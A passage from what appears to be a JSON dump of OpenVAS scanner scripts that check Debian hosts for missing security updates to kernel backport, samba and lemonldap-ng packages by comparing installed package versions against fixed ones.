value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"linux-compiler-gcc-4.9-arm\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-doc-4.9\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-686\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-all\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-all-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-all-armel\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-all-armhf\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-all-i386\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-armmp\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-armmp-lpae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-common\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-common-rt\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-marvell\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-rt-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.7-rt-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-686\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-all\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-all-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-all-armel\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-all-armhf\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-all-i386\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-armmp\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-armmp-lpae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-common\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-common-rt\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-marvell\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-rt-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.8-rt-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-686\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-all\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-all-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-all-armel\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-all-armhf\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-all-i386\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-armmp\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-armmp-lpae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-common\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-common-rt\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-marvell\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-rt-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-0.bpo.9-rt-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-686\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-686-pae-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-amd64-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-armmp\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-armmp-lpae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-marvell\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-rt-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-rt-686-pae-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-rt-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.7-rt-amd64-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-686\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-686-pae-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-amd64-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-armmp\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-armmp-lpae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-marvell\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-rt-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-rt-686-pae-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-rt-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.8-rt-amd64-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-686\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-686-pae-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-amd64-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-armmp\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-armmp-lpae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-marvell\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-rt-686-pae\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-rt-686-pae-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-rt-amd64\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-image-4.9.0-0.bpo.9-rt-amd64-dbg\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-kbuild-4.9\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-manual-4.9\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-perf-4.9\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-source-4.9\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-0.bpo.7\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-0.bpo.8\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-support-4.9.0-0.bpo.9\", ver:\"4.9.168-1+deb9u2~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-16T12:22:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "OPENVAS:1361412562310704443", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704443", "title": "Debian Security Advisory DSA 4443-1 (samba - security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704443\");\n script_version(\"2019-05-16T02:00:15+0000\");\n script_cve_id(\"CVE-2018-16860\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-16 02:00:15 +0000 (Thu, 16 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-16 02:00:15 +0000 (Thu, 16 May 2019)\");\n script_name(\"Debian Security Advisory DSA 4443-1 (samba - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4443.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4443-1\");\n script_xref(name:\"URL\", value:\"https://www.samba.org/samba/security/CVE-2018-16860.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the DSA-4443-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Isaac Boukris and Andrew Bartlett discovered that the S4U2Self Kerberos\nextension used in Samba's Active Directory support was susceptible to\nman-in-the-middle attacks caused by incomplete checksum validation.\n\nDetails can be found in the referenced upstream advisory.\");\n\n script_tag(name:\"affected\", value:\"'samba' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 2:4.5.16+dfsg-1+deb9u2.\n\nWe recommend that you upgrade your samba packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ctdb\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libnss-winbind\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libpam-winbind\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libparse-pidl-perl\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient-dev\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"python-samba\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"registry-tools\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dev\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-libs\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-testsuite\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"samba-vfs-modules\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"winbind\", ver:\"2:4.5.16+dfsg-1+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-16T12:22:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-16T00:00:00", "published": "2019-05-16T00:00:00", "id": "OPENVAS:1361412562310704446", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704446", "title": "Debian Security Advisory DSA 4446-1 (lemonldap-ng - security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704446\");\n script_version(\"2019-05-16T02:00:07+0000\");\n script_cve_id(\"CVE-2019-12046\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-16 02:00:07 +0000 (Thu, 16 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-16 02:00:07 +0000 (Thu, 16 May 2019)\");\n script_name(\"Debian Security Advisory DSA 4446-1 (lemonldap-ng - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4446.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4446-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'lemonldap-ng'\n package(s) announced via the DSA-4446-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that the Lemonldap::NG web SSO system performed\ninsufficient validation of session tokens if the tokenUseGlobalStorage \noption is enabled, which could grant users with access to the main\nsession database access to an anonymous session.\");\n\n script_tag(name:\"affected\", value:\"'lemonldap-ng' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 1.9.7-3+deb9u1.\n\nWe recommend that you upgrade your lemonldap-ng packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"lemonldap-ng\", ver:\"1.9.7-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lemonldap-ng-doc\", ver:\"1.9.7-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lemonldap-ng-fastcgi-server\", ver:\"1.9.7-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lemonldap-ng-fr-doc\", ver:\"1.9.7-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"lemonldap-ng-handler\", ver:\"1.9.7-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"liblemonldap-ng-common-perl\", ver:\"1.9.7-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"liblemonldap-ng-conf-perl\", ver:\"1.9.7-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"liblemonldap-ng-handler-perl\", ver:\"1.9.7-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"liblemonldap-ng-manager-perl\", ver:\"1.9.7-3+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = 